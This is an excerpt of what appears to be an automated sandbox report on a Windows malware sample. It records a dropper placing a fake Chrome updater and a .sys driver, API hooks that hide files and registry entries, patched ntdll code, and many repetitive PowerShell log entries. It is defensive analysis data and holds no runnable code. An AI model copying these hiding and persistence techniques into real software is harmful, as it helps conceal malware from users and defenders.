                Source: updater.exe.0.drStatic PE information: section name: .xdata
                Source: piukhnngkvtj.tmp.0.drStatic PE information: section name: .xdata
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFE7DD4D2A5 pushad ; iretd 6_2_00007FFE7DD4D2A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFE7DE6754D push ebx; iretd 6_2_00007FFE7DE6756A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFE7DE600BD pushad ; iretd 6_2_00007FFE7DE600C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFE7DE67BD3 push eax; ret 6_2_00007FFE7DE67BA9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFE7DE67B9A push eax; ret 6_2_00007FFE7DE67BA9
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A6784FD push rcx; retf 003Fh8_2_000002EA8A6784FE
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A6722B8 push rdx; retf 8_2_000002EA8A6722B9
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A6A94FD push rcx; retf 003Fh8_2_000002EA8A6A94FE
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A6F84FD push rcx; retf 003Fh8_2_000002EA8A6F84FE
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A6F22B8 push rdx; retf 8_2_000002EA8A6F22B9
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338C22B8 push rdx; retf 9_2_000001CB338C22B9
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338C84FD push rcx; retf 003Fh9_2_000001CB338C84FE
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338F94FD push rcx; retf 003Fh9_2_000001CB338F94FE
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026E027A22B8 push rdx; retf 10_2_0000026E027A22B9
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026E027A84FD push rcx; retf 003Fh10_2_0000026E027A84FE
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026E027D94FD push rcx; retf 003Fh10_2_0000026E027D94FE
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEEF84FD push rcx; retf 003Fh11_2_000001C6CEEF84FE
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEEF22B8 push rdx; retf 11_2_000001C6CEEF22B9
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF294FD push rcx; retf 003Fh11_2_000001C6CEF294FE
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF584FD push rcx; retf 003Fh11_2_000001C6CEF584FE
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF522B8 push rdx; retf 11_2_000001C6CEF522B9
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000025304F984FD push rcx; retf 003Fh12_2_0000025304F984FE
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000025304F922B8 push rdx; retf 12_2_0000025304F922B9
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C211484FD push rcx; retf 003Fh13_2_0000016C211484FE
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C211422B8 push rdx; retf 13_2_0000016C211422B9
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C211794FD push rcx; retf 003Fh13_2_0000016C211794FE
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C211D94FD push rcx; retf 003Fh13_2_0000016C211D94FE
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000026F47BE22B8 push rdx; retf 14_2_0000026F47BE22B9
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000026F47BE84FD push rcx; retf 003Fh14_2_0000026F47BE84FE
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B91DE84FD push rcx; retf 003Fh15_2_0000029B91DE84FE
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B91DE22B8 push rdx; retf 15_2_0000029B91DE22B9

                Persistence and Installation Behavior

                barindex
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to behavior
                Source: Yara matchFile source: 00000010.00000002.2675524616.0000020422C06000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2676628688.0000020422C5F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2654430567.0000020422302000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1060, type: MEMORYSTR
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeFile created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeJump to dropped file
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeFile created: C:\Users\user\AppData\Local\Temp\piukhnngkvtj.tmpJump to dropped file

                Boot Survival

                barindex
                Source: Yara matchFile source: 00000010.00000002.2675524616.0000020422C06000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2676628688.0000020422C5F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2654430567.0000020422302000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1060, type: MEMORYSTR

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PIUKHNNGKVTJ.TMP
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PIUKHNNGKVTJ.TMP
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PIUKHNNGKVTJ.TMP
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PIUKHNNGKVTJ.TMP
                Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
